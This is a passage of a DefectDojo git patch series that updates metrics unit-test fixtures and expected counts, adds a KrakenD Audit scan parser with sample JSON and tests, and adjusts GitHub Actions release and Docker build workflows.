"test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_13 = {"id": 245, "title": "Low Impact Test Finding", "date": date(2017, 12, 27), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 22, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_14 = {"id": 246, "title": "Low Impact Test Finding", "date": date(2018, 1, 2), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 22, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_15 = {"id": 247, "title": "Low Impact Test Finding", "date": date(2018, 1, 3), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 55, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "12345", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_16 = {"id": 248, "title": "UID Impact Test Finding", "date": date(2017, 12, 27), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 77, "active": True, "verified": True, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": True, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "6789", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_17 = {"id": 249, "title": "UID Impact Test Finding", "date": date(2018, 1, 4), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 77, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 224, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "6789", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} + + +ALL_FINDINGS = [FINDING_1, FINDING_2, FINDING_3, FINDING_4, FINDING_5, FINDING_6, FINDING_7, FINDING_8, FINDING_9, + FINDING_10, FINDING_11, FINDING_12, FINDING_13, FINDING_14, FINDING_15, FINDING_16, FINDING_17] +CLOSED_FINDINGS = [FINDING_11, FINDING_16] +ACCEPTED_FINDINGS = [FINDING_9, FINDING_10, FINDING_11] + + class FindingQueriesTest(DojoTestCase): - fixtures = ["dojo_testdata.json"] + fixtures = ["dojo_testdata.json", "unit_metrics_additional_data.json"] def setUp(self): user = User.objects.get(username="user1") - self.request = RequestFactory().get(reverse("metrics")) + self.request = RequestFactory().get(reverse("metrics"), { + "start_date": "2017-12-26", + "end_date": "2018-01-05", + }) self.request.user = user self.request._messages = MockMessages() @@ -49,14 +80,13 @@ def test_finding_queries(self, mock_timezone): mock_datetime = datetime(2020, 12, 9, tzinfo=timezone.utc) mock_timezone.return_value = mock_datetime - # Queries over Finding and Risk_Acceptance - with self.assertNumQueries(22): + # Queries over Finding + with self.assertNumQueries(27): product_types = [] finding_queries = utils.finding_queries( product_types, self.request, ) - self.assertSequenceEqual( list(finding_queries.keys()), [ @@ -73,64 +103,57 @@ def test_finding_queries(self, mock_timezone): "form", ], ) - # Assert that we get expected querysets back. This is to be used to # support refactoring, in attempt of lowering the query count. + self.assertSequenceEqual(finding_queries["all"].values(), ALL_FINDINGS) + self.assertSequenceEqual(finding_queries["closed"].values(), CLOSED_FINDINGS) + self.assertSequenceEqual(finding_queries["accepted"].values(), ACCEPTED_FINDINGS) + self.assertSequenceEqual( - finding_queries["all"].values(), - [], - # [{'id': 226, 'title': 'Test Endpoint Mitigation - Finding F1 Without Endpoints', 'date': date(2022, 10, 15), 'sla_start_date': None, 'cwe': None, 'cve': None, 'cvssv3': None, 'cvssv3_score': None, 'url': None, 'severity': 'Info', 'description': 'vulnerability', 'mitigation': '', 'impact': '', 'steps_to_reproduce': '', 'severity_justification': '', 'references': '', 'test_id': 89, 'active': True, 'verified': True, 'false_p': False, 'duplicate': False, 'duplicate_finding_id': None, 'out_of_scope': False, 'risk_accepted': False, 'under_review': False, 'last_status_update': None, 'review_requested_by_id': None, 'under_defect_review': False, 'defect_review_requested_by_id': None, 'is_mitigated': False, 'thread_id': 0, 'mitigated': None, 'mitigated_by_id': None, 'reporter_id': 1, 'numerical_severity': 'S4', 'last_reviewed': None, 'last_reviewed_by_id': None, 'param': None, 'payload': None, 'hash_code': 'a6dd6bd359ff0b504a21b8a7ae5e59f1b40dd0fa1715728bd58de8f688f01b19', 'line': None, 'file_path': '', 'component_name': None, 'component_version': None, 'static_finding': False, 'dynamic_finding': True, 'created': datetime(2022, 10, 15, 23, 12, 52, 966000, tzinfo=pytz.UTC), 'scanner_confidence': None, 'sonarqube_issue_id': None, 'unique_id_from_tool': None, 'vuln_id_from_tool': None, 'sast_source_object': None, 'sast_sink_object': None, 'sast_source_line': None, 'sast_source_file_path': None, 'nb_occurences': None, 'publish_date': None, 'service': None, 'planned_remediation_date': None, 'test__engagement__product__prod_type__member': True, 'test__engagement__product__member': True, 'test__engagement__product__prod_type__authorized_group': False, 'test__engagement__product__authorized_group': False}] - ) - self.assertSequenceEqual( - finding_queries["closed"].values(), - [], - ) - self.assertSequenceEqual( - finding_queries["accepted"].values(), - [], - ) - self.assertSequenceEqual( - list(finding_queries["accepted_count"].values()), - [0, 0, 0, 0, 0, 0], + finding_queries["accepted_count"], + {"total": 3, "critical": 0, "high": 3, "medium": 0, "low": 0, "info": 0}, ) self.assertSequenceEqual( finding_queries["top_ten"].values(), [], ) self.assertEqual( - list(finding_queries["monthly_counts"].values()), - [ - [ - {"epoch": 1604188800000, "grouped_date": date(2020, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, - {"epoch": 1606780800000, "grouped_date": date(2020, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, + finding_queries["monthly_counts"], + { + "opened_per_period": [ + {"epoch": 1509494400000, "grouped_date": date(2017, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, + {"epoch": 1512086400000, "grouped_date": date(2017, 12, 1), "critical": 0, "high": 2, "medium": 0, "low": 3, "info": 0, "total": 5, "closed": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 6, "medium": 0, "low": 6, "info": 0, "total": 12, "closed": 0}, ], - [ - {"epoch": 1604188800000, "grouped_date": date(2020, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, - {"epoch": 1606780800000, "grouped_date": date(2020, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + "active_per_period": [ + {"epoch": 1509494400000, "grouped_date": date(2017, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1512086400000, "grouped_date": date(2017, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 2, "info": 0, "total": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, ], - [ - {"epoch": 1604188800000, "grouped_date": date(2020, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, - {"epoch": 1606780800000, "grouped_date": date(2020, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + "accepted_per_period": [ + {"epoch": 1509494400000, "grouped_date": date(2017, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1512086400000, "grouped_date": date(2017, 12, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 2, "medium": 0, "low": 0, "info": 0, "total": 2}, ], - ], + }, ) self.assertEqual( finding_queries["weekly_counts"], { "opened_per_period": [ - {"epoch": 1606694400000, "grouped_date": date(2020, 11, 30), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "closed": 0}, - {"epoch": 1607299200000, "grouped_date": date(2020, 12, 7), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "closed": 0}, - {"epoch": 1607904000000, "grouped_date": date(2020, 12, 14), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "closed": 0}, - ], - "accepted_per_period": [ - {"epoch": 1606694400000, "grouped_date": date(2020, 11, 30), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607299200000, "grouped_date": date(2020, 12, 7), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607904000000, "grouped_date": date(2020, 12, 14), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, + {"epoch": 1513555200000, "grouped_date": date(2017, 12, 18), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, + {"epoch": 1514160000000, "grouped_date": date(2017, 12, 25), "critical": 0, "high": 2, "medium": 0, "low": 3, "info": 0, "total": 5, "closed": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 6, "medium": 0, "low": 6, "info": 0, "total": 12, "closed": 0}, ], "active_per_period": [ - {"epoch": 1606694400000, "grouped_date": date(2020, 11, 30), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607299200000, "grouped_date": date(2020, 12, 7), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, - {"epoch": 1607904000000, "grouped_date": date(2020, 12, 14), "total": 0, "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}, + {"epoch": 1513555200000, "grouped_date": date(2017, 12, 18), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1514160000000, "grouped_date": date(2017, 12, 25), "critical": 0, "high": 0, "medium": 0, "low": 2, "info": 0, "total": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, + ], + "accepted_per_period": [ + {"epoch": 1513555200000, "grouped_date": date(2017, 12, 18), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, + {"epoch": 1514160000000, "grouped_date": date(2017, 12, 25), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 0, "total": 1}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 2, "medium": 0, "low": 0, "info": 0, "total": 2}, ], }, ) @@ -224,14 +247,17 @@ def test_endpoint_queries(self): [ {"epoch": 1590969600000, "grouped_date": date(2020, 6, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, {"epoch": 1593561600000, "grouped_date": date(2020, 7, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 5, "total": 6, "closed": 0}, + {"epoch": 1596240000000, "grouped_date": date(2020, 8, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, ], [ {"epoch": 1590969600000, "grouped_date": date(2020, 6, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, {"epoch": 1593561600000, "grouped_date": date(2020, 7, 1), "critical": 0, "high": 1, "medium": 0, "low": 0, "info": 4, "total": 5}, + {"epoch": 1596240000000, "grouped_date": date(2020, 8, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, ], [ {"epoch": 1590969600000, "grouped_date": date(2020, 6, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, {"epoch": 1593561600000, "grouped_date": date(2020, 7, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 1, "total": 1}, + {"epoch": 1596240000000, "grouped_date": date(2020, 8, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0}, ], ], ) From c0b12fecfe5173ee7dfcf233775901a74d3cb740 Mon Sep 17 00:00:00 2001 From: manuelsommer <47991713+manuel-sommer@users.noreply.github.com> Date: Fri, 20 Sep 2024 23:11:00 +0200 Subject: [PATCH 42/62] :sparkles: implement krakend audit parser (#10924) * :sparkles: implement krakend audit parser * advance unittests --- .../parsers/file/krakend_audit.md | 11 ++++++ dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 ++ dojo/tools/krakend_audit/__init__.py | 1 + dojo/tools/krakend_audit/parser.py | 34 +++++++++++++++++++ .../scans/krakend_audit/many_findings.json | 30 ++++++++++++++++ .../scans/krakend_audit/no_findings.json | 4 +++ unittests/tools/test_krakend_audit_parser.py | 22 ++++++++++++ 8 files changed, 105 insertions(+), 1 deletion(-) create mode 100644 docs/content/en/integrations/parsers/file/krakend_audit.md create mode 100644 dojo/tools/krakend_audit/__init__.py create mode 100644 dojo/tools/krakend_audit/parser.py create mode 100644 unittests/scans/krakend_audit/many_findings.json create mode 100644 unittests/scans/krakend_audit/no_findings.json create mode 100644 unittests/tools/test_krakend_audit_parser.py diff --git a/docs/content/en/integrations/parsers/file/krakend_audit.md b/docs/content/en/integrations/parsers/file/krakend_audit.md new file mode 100644 index 00000000000..9598ce343b8 --- /dev/null +++ b/docs/content/en/integrations/parsers/file/krakend_audit.md @@ -0,0 +1,11 @@ +--- +title: "KrakenD Audit Scan" +toc_hide: true +--- +Import KrakenD Audit Scan results in JSON format. You can use the following command to audit the KrakenD configuration which then can be uploaded to DefectDojo: +``` +krakend audit -c krakend.json -f "{{ marshal . }}" >> recommendations.json +``` + +### Sample Scan Data +Sample KrakenD Audit scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/krakend_audit). \ No newline at end of file diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 38c8e498527..5dfa946a6c2 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -702d74c8bc703d11c03cf5b3f7c4319ad0cdeaef68db6426d1112c59e59365a6 +b330f7dbd92c2df5a2a0632befc9775bef4a1c62b90375aa511957ebcd0ea82a diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index bd33f7fed8a..d96733ca8ff 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1280,6 +1280,7 @@ def saml2_attrib_map_format(dict): "Legitify Scan": ["title", "endpoints", "severity"], "ThreatComposer Scan": ["title", "description"], "Invicti Scan": ["title", "description", "severity"], + "KrakenD Audit Scan": ["description", "mitigation", "severity"], } # Override the hardcoded settings here via the env var @@ -1505,6 +1506,7 @@ def saml2_attrib_map_format(dict): "Legitify Scan": DEDUPE_ALGO_HASH_CODE, "ThreatComposer Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, "Invicti Scan": DEDUPE_ALGO_HASH_CODE, + "KrakenD Audit Scan": DEDUPE_ALGO_HASH_CODE, } # Override the hardcoded settings here via the env var diff --git a/dojo/tools/krakend_audit/__init__.py b/dojo/tools/krakend_audit/__init__.py new file mode 100644 index 00000000000..3ad798a42b3 --- /dev/null +++ b/dojo/tools/krakend_audit/__init__.py @@ -0,0 +1 @@ +__author__ = "manuel-sommer" diff --git a/dojo/tools/krakend_audit/parser.py b/dojo/tools/krakend_audit/parser.py new file mode 100644 index 00000000000..062c978e3c5 --- /dev/null +++ b/dojo/tools/krakend_audit/parser.py @@ -0,0 +1,34 @@ +import json + +from dojo.models import Finding + + +class KrakenDAuditParser: + def get_scan_types(self): + return ["KrakenD Audit Scan"] + + def get_label_for_scan_types(self, scan_type): + return scan_type # no custom label for now + + def get_description_for_scan_types(self, scan_type): + return "Import JSON reports of KrakenD Audit Scans." + + def get_findings(self, file, test): + data = json.load(file) + findings = [] + for recommendation in data.get("recommendations", []): + rule = recommendation.get("rule", None) + severity = recommendation.get("severity") + message = recommendation.get("message", None) + if rule is not None: + finding = Finding( + title="KrakenD" + "_" + rule, + test=test, + description="**Rule:** " + rule, + severity=severity.lower().capitalize(), + mitigation=message, + static_finding=True, + dynamic_finding=False, + ) + findings.append(finding) + return findings diff --git a/unittests/scans/krakend_audit/many_findings.json b/unittests/scans/krakend_audit/many_findings.json new file mode 100644 index 00000000000..726ae2d029c --- /dev/null +++ b/unittests/scans/krakend_audit/many_findings.json @@ -0,0 +1,30 @@ +{ + "recommendations": [ + { + "rule": "2.1.2", + "severity": "HIGH", + "message": "Enable TLS or use a terminator in front of KrakenD." + }, + { + "rule": "2.1.7", + "severity": "HIGH", + "message": "Enable HTTP security header checks (security/http)." + }, + { + "rule": "2.2.1", + "severity": "MEDIUM", + "message": "Hide the version banner in runtime." + }, + { + "rule": "3.1.1", + "severity": "LOW", + "message": "Enable a bot detector." + }, + { + "rule": "4.2.1", + "severity": "MEDIUM", + "message": "Implement a telemetry system for tracing for monitoring and troubleshooting." + } + ], + "stats": {} + } \ No newline at end of file diff --git a/unittests/scans/krakend_audit/no_findings.json b/unittests/scans/krakend_audit/no_findings.json new file mode 100644 index 00000000000..cfbc08ae70a --- /dev/null +++ b/unittests/scans/krakend_audit/no_findings.json @@ -0,0 +1,4 @@ +{ + "recommendations": [], + "stats": {} + } \ No newline at end of file diff --git a/unittests/tools/test_krakend_audit_parser.py b/unittests/tools/test_krakend_audit_parser.py new file mode 100644 index 00000000000..60f44d51ec1 --- /dev/null +++ b/unittests/tools/test_krakend_audit_parser.py @@ -0,0 +1,22 @@ +from dojo.models import Test +from dojo.tools.krakend_audit.parser import KrakenDAuditParser +from unittests.dojo_test_case import DojoTestCase + + +class TestKrakenDAuditParser(DojoTestCase): + + def test_parse_no_findings(self): + with open("unittests/scans/krakend_audit/no_findings.json", encoding="utf-8") as testfile: + parser = KrakenDAuditParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + def test_parse_many_findings(self): + with open("unittests/scans/krakend_audit/many_findings.json", encoding="utf-8") as testfile: + parser = KrakenDAuditParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(5, len(findings)) + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertEqual("Enable TLS or use a terminator in front of KrakenD.", finding.mitigation) From 1755effd674bdc83878162ccd7ee9909b50299b1 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:13:02 -0500 Subject: [PATCH 43/62] GHA Release: Update settings SHA when creating PR from master (#10927) --- .github/workflows/release-3-master-into-dev.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/release-3-master-into-dev.yml b/.github/workflows/release-3-master-into-dev.yml index b5c8828ee16..cbd287d232e 100644 --- a/.github/workflows/release-3-master-into-dev.yml +++ b/.github/workflows/release-3-master-into-dev.yml @@ -50,11 +50,15 @@ jobs: CURRENT_CHART_VERSION=$(grep -oP 'version: (\K\S*)?' helm/defectdojo/Chart.yaml | head -1) sed -ri "0,/version/s/version: \S+/$(echo "version: $CURRENT_CHART_VERSION" | awk -F. -v OFS=. 'NF==1{print ++$NF}; NF>1{$NF=sprintf("%0*d", length($NF), ($NF+1)); print}')-dev/" helm/defectdojo/Chart.yaml + - name: Update settings SHA + run: sha256sum dojo/settings/settings.dist.py | cut -d ' ' -f1 > dojo/settings/.settings.dist.py.sha256sum + - name: Check numbers run: | grep version dojo/__init__.py grep appVersion helm/defectdojo/Chart.yaml grep version components/package.json + cat dojo/settings/.settings.dist.py.sha256sum - name: Create upgrade notes to documentation run: | @@ -132,11 +136,15 @@ jobs: CURRENT_CHART_VERSION=$(grep -oP 'version: (\K\S*)?' helm/defectdojo/Chart.yaml | head -1) sed -ri "0,/version/s/version: \S+/$(echo "version: $CURRENT_CHART_VERSION" | awk -F. -v OFS=. 'NF==1{print ++$NF}; NF>1{$NF=sprintf("%0*d", length($NF), ($NF+1)); print}')-dev/" helm/defectdojo/Chart.yaml + - name: Update settings SHA + run: sha256sum dojo/settings/settings.dist.py | cut -d ' ' -f1 > dojo/settings/.settings.dist.py.sha256sum + - name: Check numbers run: | grep version dojo/__init__.py grep appVersion helm/defectdojo/Chart.yaml grep version components/package.json + cat dojo/settings/.settings.dist.py.sha256sum - name: Push version changes uses: stefanzweifel/git-auto-commit-action@v5.0.1 From b62884364cfeb44684214b3e7c1e908cc6134ff4 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:14:01 -0500 Subject: [PATCH 44/62] GHA: Remove Docker Caches (#10928) --- .../build-docker-images-for-testing.yml | 4 +--- .../release-x-manual-docker-containers.yml | 20 ------------------- 2 files changed, 1 insertion(+), 23 deletions(-) diff --git a/.github/workflows/build-docker-images-for-testing.yml b/.github/workflows/build-docker-images-for-testing.yml index a8a570a9f8c..c5753973ae2 100644 --- a/.github/workflows/build-docker-images-for-testing.yml +++ b/.github/workflows/build-docker-images-for-testing.yml @@ -45,9 +45,7 @@ jobs: tags: defectdojo/defectdojo-${{ matrix.docker-image }}:${{ matrix.os }} file: Dockerfile.${{ matrix.docker-image }}-${{ matrix.os }} outputs: type=docker,dest=${{ matrix.docker-image }}-${{ matrix.os }}_img - cache-from: type=gha,scope=${{ matrix.docker-image }} - cache-to: type=gha,mode=max,scope=${{ matrix.docker-image }} - + # export docker images to be used in next jobs below - name: Upload image ${{ matrix.docker-image }} as artifact timeout-minutes: 10 diff --git a/.github/workflows/release-x-manual-docker-containers.yml b/.github/workflows/release-x-manual-docker-containers.yml index bae585d2388..6f8862b6216 100644 --- a/.github/workflows/release-x-manual-docker-containers.yml +++ b/.github/workflows/release-x-manual-docker-containers.yml @@ -49,18 +49,6 @@ jobs: id: buildx uses: docker/setup-buildx-action@v3 - - name: Cache Docker layers - uses: actions/cache@v4 - env: - docker-image: ${{ matrix.docker-image }} - with: - path: /tmp/.buildx-cache-${{ env.docker-image }} - key: ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}-${{ env.workflow_name }}-${{ github.sha }}-${{ github.run_id }} - restore-keys: | - ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}-${{ env.workflow_name}}-${{ github.sha }} - ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}-${{ env.workflow_name }} - ${{ runner.os }}-buildx-${{ env.docker-image }}-${{ matrix.os }}- - - name: Build and push images with debian if: ${{ matrix.os == 'debian' }} uses: docker/build-push-action@v6 @@ -73,8 +61,6 @@ jobs: tags: ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:${{ github.event.inputs.release_number }}-${{ matrix.os }}, ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:${{ github.event.inputs.release_number }}, ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:latest file: ./Dockerfile.${{ env.docker-image }}-${{ matrix.os }} context: . - cache-from: type=local,src=/tmp/.buildx-cache-${{ env.docker-image }} - cache-to: type=local,dest=/tmp/.buildx-cache-${{ env.docker-image }} - name: Build and push images with alpine if: ${{ matrix.os == 'alpine' }} @@ -88,9 +74,3 @@ jobs: tags: ${{ env.REPO_ORG }}/defectdojo-${{ env.docker-image}}:${{ github.event.inputs.release_number }}-${{ matrix.os }} file: ./Dockerfile.${{ env.docker-image }}-${{ matrix.os }} context: . - cache-from: type=local,src=/tmp/.buildx-cache-${{ env.docker-image }} - cache-to: type=local,dest=/tmp/.buildx-cache-${{ env.docker-image }} -# platforms: ${{ matrix.platform }} - - - name: Image digest - run: echo ${{ steps.docker_build.outputs.digest }} From aadf96b8162bfcf58556edc464354d1c0febb853 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 